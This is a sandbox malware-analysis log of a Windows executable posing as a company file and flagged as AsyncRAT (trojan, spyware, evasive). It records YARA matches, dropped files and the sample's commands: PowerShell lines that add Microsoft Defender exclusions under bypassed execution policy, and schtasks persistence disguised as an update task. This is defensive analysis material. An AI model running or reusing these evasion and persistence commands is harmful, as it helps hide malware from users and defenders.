Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2071781432.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2092667055.000000000BA90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073615538.000000000498A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000000.2038933223.0000000000DFC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4544624751.0000000006569000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4540909750.0000000004341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2383977857.000000000136E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2395996846.0000000005974000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exej% vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2392500334.0000000004AEF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2475189992.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2477067466.0000000005A66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exe.m vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe.9.dr	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe

Uses 32bit PE files

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: SS Bottmac Engineers Pvt. Ltd..exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RTUZKYTc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SS Bottmac Engineers Pvt. Ltd..exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/32@13/1

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Mutant created: \Sessions\1\BaseNamedObjects\TdUxMCK2FUdy51AH

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Local\Temp\tmp960E.tmp

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File read: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe C:\Users\user\AppData\Roaming\RTUZKYTc.exe
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll	Jump to behavior
